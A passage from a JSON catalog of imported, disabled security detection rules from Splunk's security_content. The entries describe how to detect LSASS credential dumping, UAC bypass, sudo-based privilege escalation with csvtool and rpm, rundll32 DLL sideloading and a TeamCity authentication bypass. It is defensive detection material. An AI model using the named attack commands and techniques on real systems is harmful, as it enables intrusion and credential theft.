If confirmed malicious, this could allow the attacker to persist undetected, complicating incident response and remediation efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/process-deleting-its-process-file-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7eda4bc-871c-11eb-b110-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/process_deleting_its_process_file_path.yml" } }, { "id": "splunk-security-content-f7f7456b-470d-4a95-9703-698250645ff4", "type": "detection", "name": "Windows Powershell RemoteSigned File", "description": "The following analytic identifies the use of the \"remotesigned\" execution policy for PowerShell scripts. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing \"remotesigned\" and \"-File\". This activity is significant because the \"remotesigned\" policy allows locally created scripts to run without restrictions, posing a potential security risk. 
If confirmed malicious, an attacker could execute unauthorized scripts, leading to code execution, privilege escalation, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-remotesigned-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7f7456b-470d-4a95-9703-698250645ff4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_remotesigned_file.yml" } }, { "id": "splunk-security-content-f8384f9e-1a5c-4c3a-96d6-8a7e5a38a8b8", "type": "detection", "name": "Linux Csvtool Privilege Escalation", "description": "The following analytic detects the execution of the 'csvtool' command with 'sudo' privileges, which can allow a user to run system commands as root. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it indicates a potential privilege escalation attempt, where a user could gain unauthorized root access. 
If confirmed malicious, this could lead to full system compromise, allowing an attacker to execute arbitrary commands, escalate privileges, and maintain persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-csvtool-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8384f9e-1a5c-4c3a-96d6-8a7e5a38a8b8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_csvtool_privilege_escalation.yml" } }, { "id": "splunk-security-content-f86a8ec9-b042-45eb-92f4-e9ed1d781078", "type": "detection", "name": "Cloud Provisioning Activity From Previously Unseen IP Address", "description": "The following analytic detects cloud provisioning activities originating from previously unseen IP addresses. It leverages cloud infrastructure logs to identify events where resources are created or started, and cross-references these with a baseline of known IP addresses. This activity is significant as it may indicate unauthorized access or potential misuse of cloud resources. 
If confirmed malicious, an attacker could gain unauthorized control over cloud resources, leading to data breaches, service disruptions, or increased operational costs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-provisioning-activity-from-previously-unseen-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f86a8ec9-b042-45eb-92f4-e9ed1d781078", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_provisioning_activity_from_previously_unseen_ip_address.yml" } }, { "id": "splunk-security-content-f87aa96b-369b-4a3e-9021-1bbacbfcb8fb", "type": "detection", "name": "Windows Driver Inventory", "description": "The following analytic identifies drivers being loaded across the fleet. It leverages a PowerShell script input deployed to critical systems to capture driver data. This detection is significant as it helps monitor for unauthorized or malicious drivers that could compromise system integrity. 
If confirmed malicious, such drivers could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-driver-inventory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f87aa96b-369b-4a3e-9021-1bbacbfcb8fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_driver_inventory.yml" } }, { "id": "splunk-security-content-f87b5062-b405-11eb-a889-acde48001122", "type": "detection", "name": "CMLUA Or CMSTPLUA UAC Bypass", "description": "The following analytic detects the use of COM objects like CMLUA or CMSTPLUA to bypass User Account Control (UAC). It leverages Sysmon EventCode 7 to identify the loading of specific DLLs (CMLUA.dll, CMSTPLUA.dll, CMLUAUTIL.dll) by processes not typically associated with these libraries. This activity is significant as it indicates an attempt to gain elevated privileges, a common tactic used by ransomware adversaries. 
If confirmed malicious, this could allow attackers to execute code with administrative rights, leading to potential system compromise and further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cmlua-or-cmstplua-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f87b5062-b405-11eb-a889-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml" } }, { "id": "splunk-security-content-f8a22586-ee2d-11eb-a193-acde48001122", "type": "detection", "name": "Rundll32 CreateRemoteThread In Browser", "description": "The following analytic detects the suspicious creation of a remote thread by rundll32.exe targeting browser processes such as firefox.exe, chrome.exe, iexplore.exe, and microsoftedgecp.exe. This detection leverages Sysmon EventCode 8, focusing on SourceImage and TargetImage fields to identify the behavior. This activity is significant as it is commonly associated with malware like IcedID, which hooks browsers to steal sensitive information such as banking details. 
If confirmed malicious, this could allow attackers to intercept and exfiltrate sensitive user data, leading to potential financial loss and privacy breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-createremotethread-in-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8a22586-ee2d-11eb-a193-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_createremotethread_in_browser.yml" } }, { "id": "splunk-security-content-f8b482f4-6d62-49fa-a905-dfa15698317b", "type": "detection", "name": "Windows Powershell Cryptography Namespace", "description": "The following analytic detects suspicious PowerShell script execution involving the cryptography namespace via EventCode 4104. It leverages PowerShell Script Block Logging to identify scripts using cryptographic functions, excluding common hashes like SHA and MD5. This activity is significant as it is often associated with malware that decrypts or decodes additional malicious payloads. If confirmed malicious, this could allow an attacker to execute further code, escalate privileges, or establish persistence within the environment. 
Analysts should investigate the parent process, decrypted data, network connections, and the user executing the script.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-cryptography-namespace.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8b482f4-6d62-49fa-a905-dfa15698317b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_cryptography_namespace.yml" } }, { "id": "splunk-security-content-f8ba49e7-ffd3-4b53-8f61-e73974583c5d", "type": "detection", "name": "Azure AD Service Principal Created", "description": "The following analytic detects the creation of a Service Principal in an Azure AD environment. It leverages Azure Active Directory events ingested through EventHub, specifically monitoring the \"Add service principal\" operation. This activity is significant because Service Principals can be used by adversaries to establish persistence and bypass multi-factor authentication and conditional access policies. 
If confirmed malicious, this could allow attackers to maintain single-factor access to the Azure AD environment, potentially leading to unauthorized access to resources and prolonged undetected activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8ba49e7-ffd3-4b53-8f61-e73974583c5d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_created.yml" } }, { "id": "splunk-security-content-f8c325ea-506e-4105-8ccf-da1492e90115", "type": "detection", "name": "Linux Auditd Add User Account Type", "description": "The following analytic detects the suspicious add user account type. This behavior is critical for a SOC to monitor because it may indicate attempts to gain unauthorized access or maintain control over a system. Such actions could be signs of malicious activity. If confirmed, this could lead to serious consequences, including a compromised system, unauthorized access to sensitive data, or even a wider breach affecting the entire network. 
Detecting and responding to these signs early is essential to prevent potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-add-user-account-type.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8c325ea-506e-4105-8ccf-da1492e90115", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_add_user_account_type.yml" } }, { "id": "splunk-security-content-f8db6e0b-55bb-40ca-bc85-2b3700adb0f8", "type": "detection", "name": "MacOS List Firewall Rules", "description": "This analytic detects attempts to enumerate or verify the configuration of the macOS application firewall.\nSpecifically, it monitors executions of `defaults read /Library/Preferences/com.apple.alf` and `/usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate`.\nThese commands provide insight into firewall status, allowed applications, and explicit authorization rules.\nWhile they are legitimate administrative operations, adversaries may leverage them to identify potential attack surfaces, determine whether the firewall is active, or enumerate allowed network flows.\nMonitoring for these commands, particularly when executed by non-administrative users or at unusual times, can provide early indication of reconnaissance activity on macOS endpoints.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/macos-list-firewall-rules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8db6e0b-55bb-40ca-bc85-2b3700adb0f8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_list_firewall_rules.yml" } }, { "id": "splunk-security-content-f8e58a23-cecd-495f-9c65-6c76b4cb9774", "type": "detection", "name": "Linux RPM Privilege Escalation", "description": "The following analytic detects the execution of the RPM Package Manager with elevated privileges, specifically when it is used to run system commands as root via the `--eval` and `lua:os.execute` options. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process metadata. This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to gain root access. 
If confirmed malicious, this could lead to full system compromise, unauthorized access to sensitive data, and further exploitation of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-rpm-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f8e58a23-cecd-495f-9c65-6c76b4cb9774", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_rpm_privilege_escalation.yml" } }, { "id": "splunk-security-content-f92d74f2-4921-11ec-b685-acde48001122", "type": "detection", "name": "System Info Gathering Using Dxdiag Application", "description": "The following analytic identifies the execution of the dxdiag.exe process with specific command-line arguments, which is used to gather system information. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line details. This activity is significant because dxdiag.exe is rarely used in corporate environments and its execution may indicate reconnaissance efforts by malicious actors. 
If confirmed malicious, this activity could allow attackers to collect detailed system information, aiding in further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/system-info-gathering-using-dxdiag-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f92d74f2-4921-11ec-b685-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/system_info_gathering_using_dxdiag_application.yml" } }, { "id": "splunk-security-content-f9593331-804c-4268-8b4c-2693c5ae786c", "type": "detection", "name": "Windows Rundll32 Execution With Log.DLL", "description": "Identifies the execution of rundll32 with a command line argument of \"log.dll\", as used in the Lotus Blossom Chrysalis backdoor campaign.\nAttackers placed a malicious \"log.dll\" in \"%AppData%\\Bluetooth\" and invoked it via rundll32.exe \"log.dll,LogInit\" to decrypt and execute ShellCode.\nThe legitimate Bitdefender Submission Wizard (BDSubmit.exe, bdsw.exe) also uses log.dll and is vulnerable to DLL sideloading.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/windows-rundll32-execution-with-log-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f9593331-804c-4268-8b4c-2693c5ae786c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rundll32_execution_with_log_dll.yml" } }, { "id": "splunk-security-content-f9cadf4e-df22-4f4e-a08f-9d3344c2165d", "type": "detection", "name": "Kubernetes Scanning by Unauthenticated IP Address", "description": "The following analytic identifies potential scanning activities within a Kubernetes environment by unauthenticated IP addresses. It leverages Kubernetes audit logs to detect multiple unauthorized access attempts (HTTP 403 responses) from the same source IP. This activity is significant as it may indicate an attacker probing for vulnerabilities or attempting to exploit known issues. 
If confirmed malicious, such scanning could lead to unauthorized access, data breaches, or further exploitation of the Kubernetes infrastructure, compromising the security and integrity of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-scanning-by-unauthenticated-ip-address.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f9cadf4e-df22-4f4e-a08f-9d3344c2165d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_scanning_by_unauthenticated_ip_address.yml" } }, { "id": "splunk-security-content-fa1c3040-4680-11ec-a618-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via DCOM and PowerShell Script Block", "description": "The following analytic detects the execution of PowerShell commands that initiate a process on a remote endpoint via the DCOM protocol. It leverages PowerShell Script Block Logging (EventCode=4104) to identify the use of ShellExecute and ExecuteShellCommand. This activity is significant as it may indicate lateral movement or remote code execution attempts by adversaries. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-dcom-and-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fa1c3040-4680-11ec-a618-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_dcom_and_powershell_script_block.yml" } }, { "id": "splunk-security-content-fa4089e2-50e3-40f7-8469-d2cc1564ca59", "type": "detection", "name": "Cloud Compute Instance Created In Previously Unused Region", "description": "The following analytic detects the creation of a cloud compute instance in a region that has not been previously used within the last hour. It leverages cloud infrastructure logs and compares the regions of newly created instances against a lookup file of historically used regions. This activity is significant because the creation of instances in new regions can indicate unauthorized or suspicious activity, such as an attacker attempting to evade detection or establish a foothold in a less monitored area. 
If confirmed malicious, this could lead to unauthorized resource usage, data exfiltration, or further compromise of the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1535" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-compute-instance-created-in-previously-unused-region.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fa4089e2-50e3-40f7-8469-d2cc1564ca59", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_compute_instance_created_in_previously_unused_region.yml" } }, { "id": "splunk-security-content-fa6142a7-c364-4d11-9954-895dd9efb2d4", "type": "detection", "name": "Windows DISM Install PowerShell Web Access", "description": "The following analytic detects the installation of PowerShell Web Access using the Deployment Image Servicing and Management (DISM) tool. It leverages Sysmon EventID 1 to identify the execution of `dism.exe` with specific parameters related to enabling the WindowsPowerShellWebAccess feature. This activity is significant because enabling PowerShell Web Access can facilitate remote execution of PowerShell commands, potentially allowing an attacker to gain unauthorized access to systems and networks. 
If confirmed malicious, this action could lead to further exploitation and compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dism-install-powershell-web-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fa6142a7-c364-4d11-9954-895dd9efb2d4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dism_install_powershell_web_access.yml" } }, { "id": "splunk-security-content-fa7ca5c6-c9d8-11eb-bce9-acde48001122", "type": "detection", "name": "Permission Modification using Takeown App", "description": "The following analytic detects the modification of file or directory permissions using the takeown.exe Windows application. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include process GUID, process name, and command-line details. This activity is significant because it is a common technique used by ransomware to take ownership of files or folders for encryption or deletion. 
If confirmed malicious, this could lead to unauthorized access, data encryption, or data destruction, severely impacting the integrity and availability of critical data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/permission-modification-using-takeown-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fa7ca5c6-c9d8-11eb-bce9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/permission_modification_using_takeown_app.yml" } }, { "id": "splunk-security-content-fa90f372-f91d-11eb-816c-acde48001122", "type": "detection", "name": "Rundll32 LockWorkStation", "description": "The following analytic detects the execution of the rundll32.exe command with the user32.dll,LockWorkStation parameter, which is used to lock the workstation via command line. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it is an uncommon method to lock a screen and has been observed in CONTI ransomware tooling for defense evasion. 
If confirmed malicious, this technique could indicate an attempt to evade detection and hinder incident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll32-lockworkstation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fa90f372-f91d-11eb-816c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll32_lockworkstation.yml" } }, { "id": "splunk-security-content-fabd364e-04f3-11ec-b34b-acde48001122", "type": "detection", "name": "GetWmiObject DS User with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-WmiObject` cmdlet with the `DS_User` class parameter via PowerShell Script Block Logging (EventCode=4104). It leverages logs to identify attempts to query all domain users using WMI. This activity is significant as it may indicate an adversary or Red Team operation attempting to enumerate domain users for situational awareness and Active Directory discovery. 
If confirmed malicious, this behavior could lead to further reconnaissance, enabling attackers to map out the network and identify potential targets for privilege escalation or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-user-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fabd364e-04f3-11ec-b34b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_user_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-faefb681-14be-4f0d-9cac-0bc0160c7280", "type": "detection", "name": "Windows Multiple Account Passwords Changed", "description": "The following analytic detects instances where more than five unique Windows account passwords are changed within a 10-minute interval. It leverages Event Code 4724 from the Windows Security Event Log, using the wineventlog_security dataset to monitor and count distinct TargetUserName values. This behavior is significant as rapid password changes across multiple accounts are unusual and may indicate unauthorized access or internal compromise. 
If confirmed malicious, this activity could lead to widespread account compromise, unauthorized access to sensitive information, and potential disruption of services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-account-passwords-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "faefb681-14be-4f0d-9cac-0bc0160c7280", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_account_passwords_changed.yml" } }, { "id": "splunk-security-content-fb3b2bb3-75a4-4279-848a-165b42624770", "type": "detection", "name": "Windows Computer Account Requesting Kerberos Ticket", "description": "The following analytic detects a computer account requesting a Kerberos ticket, which is unusual as typically user accounts request these tickets. This detection leverages Windows Security Event Logs, specifically EventCode 4768, to identify instances where the TargetUserName ends with a dollar sign ($), indicating a computer account. This activity is significant because it may indicate the use of tools like KrbUpRelay or other Kerberos-based attacks. 
If confirmed malicious, this could allow attackers to impersonate computer accounts, potentially leading to unauthorized access and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-computer-account-requesting-kerberos-ticket.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fb3b2bb3-75a4-4279-848a-165b42624770", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_computer_account_requesting_kerberos_ticket.yml" } }, { "id": "splunk-security-content-fb4c31b0-13e8-4155-8aa5-24de4b8d6717", "type": "detection", "name": "Access LSASS Memory for Dump Creation", "description": "The following analytic detects attempts to dump the LSASS process memory, a common technique in credential dumping attacks. It leverages Sysmon logs, specifically EventCode 10, to identify suspicious call traces to dbgcore.dll and dbghelp.dll associated with lsass.exe. This activity is significant as it often precedes the theft of sensitive login credentials, posing a high risk of unauthorized access to systems and data. 
If confirmed malicious, attackers could gain access to critical credentials, enabling further compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/access-lsass-memory-for-dump-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "fb4c31b0-13e8-4155-8aa5-24de4b8d6717", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/access_lsass_memory_for_dump_creation.yml" } }, { "id": "splunk-security-content-fbcc04c7-8a79-453c-b3a9-c232c423bdd3", "type": "detection", "name": "JetBrains TeamCity Authentication Bypass Suricata CVE-2024-27198", "description": "The following analytic detects attempts to exploit the CVE-2024-27198 vulnerability in JetBrains TeamCity on-premises servers, which allows attackers to bypass authentication mechanisms. It leverages Suricata HTTP traffic logs to identify suspicious POST requests to the `/app/rest/users` and `/app/rest/users/id:1/tokens` endpoints. This activity is significant because it can lead to unauthorized administrative access, enabling attackers to gain full control over the TeamCity server, including projects, builds, agents, and artifacts. 
